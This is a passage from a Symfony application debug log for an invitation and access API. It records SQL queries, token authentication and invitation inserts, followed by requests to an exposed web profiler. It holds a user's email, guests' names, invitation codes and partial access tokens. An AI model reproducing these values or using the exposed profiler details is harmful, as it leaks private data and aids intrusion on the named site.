  6186. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  6187. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6188. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  6189. [2025-12-20 01:14:25] doctrine.DEBUG: "START TRANSACTION" [] []
  6190. [2025-12-20 01:14:25] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"d4edf5db-16af-4f12-ade7-fd [...]","2":1,"3":"2025-12-20 01:14:25","4":"2025-12-20 01:14:25","5":"Jose","6":"Aysa","7":"404628","8":"/invitation/2a747460158151 [...]","9":"1","10":null,"11":"2025-12-20 01:14:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  6191. [2025-12-20 01:14:25] doctrine.DEBUG: "COMMIT" [] []
  6192. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6193. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  6194. [2025-12-20 01:14:25] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6195. [2025-12-20 01:14:25] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  6196. [2025-12-20 01:14:25] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  6197. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6198. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6199. [2025-12-20 01:14:25] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  6200. [2025-12-20 01:14:25] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  6201. [2025-12-20 01:14:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6202. [2025-12-20 01:14:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6203. [2025-12-20 01:14:25] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6204. [2025-12-20 01:14:25] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6205. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6206. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6207. [2025-12-20 01:14:25] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6208. [2025-12-20 01:14:25] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6209. [2025-12-20 01:14:25] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6210. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6211. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  6212. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6213. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  6214. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  6215. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  6216. [2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6217. [2025-12-20 01:14:25] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6218. [2025-12-20 01:14:40] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  6219. [2025-12-20 01:14:40] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  6220. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6221. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6222. [2025-12-20 01:14:40] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  6223. [2025-12-20 01:14:40] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  6224. [2025-12-20 01:14:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6225. [2025-12-20 01:14:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6226. [2025-12-20 01:14:40] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6227. [2025-12-20 01:14:40] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6228. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6229. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6230. [2025-12-20 01:14:40] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6231. [2025-12-20 01:14:40] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6232. [2025-12-20 01:14:40] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6233. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6234. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  6235. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  6236. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6237. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  6238. [2025-12-20 01:14:40] doctrine.DEBUG: "START TRANSACTION" [] []
  6239. [2025-12-20 01:14:40] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"c53b9621-0ec7-4aad-878c-b1 [...]","2":1,"3":"2025-12-20 01:14:40","4":"2025-12-20 01:14:40","5":"Arturo","6":"Cabrera","7":"777633","8":"/invitation/9acb4a182f886e [...]","9":"1","10":null,"11":"2025-12-20 01:14:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  6240. [2025-12-20 01:14:40] doctrine.DEBUG: "COMMIT" [] []
  6241. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6242. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  6243. [2025-12-20 01:14:40] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6244. [2025-12-20 01:14:40] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  6245. [2025-12-20 01:14:40] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  6246. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6247. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6248. [2025-12-20 01:14:40] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  6249. [2025-12-20 01:14:40] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  6250. [2025-12-20 01:14:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6251. [2025-12-20 01:14:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6252. [2025-12-20 01:14:40] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6253. [2025-12-20 01:14:40] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6254. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6255. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6256. [2025-12-20 01:14:40] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6257. [2025-12-20 01:14:40] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6258. [2025-12-20 01:14:40] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6259. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6260. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  6261. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6262. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  6263. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  6264. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  6265. [2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6266. [2025-12-20 01:14:40] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6267. [2025-12-20 01:15:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"565723","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/565723?panel=events","method":"GET"} []
  6268. [2025-12-20 01:15:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  6269. [2025-12-20 01:18:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"689482","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/689482?panel=time","method":"GET"} []
  6270. [2025-12-20 01:18:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6271. [2025-12-20 01:18:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"79f5c0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/79f5c0?panel=form","method":"GET"} []
  6272. [2025-12-20 01:18:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  6273. [2025-12-20 01:26:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"924f94","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/924f94?panel=swiftmailer","method":"GET"} []
  6274. [2025-12-20 01:26:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  6275. [2025-12-20 01:27:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=dump","method":"GET"} []
  6276. [2025-12-20 01:27:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  6277. [2025-12-20 01:31:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6278. [2025-12-20 01:37:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7e4910","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7e4910?panel=cache","method":"GET"} []
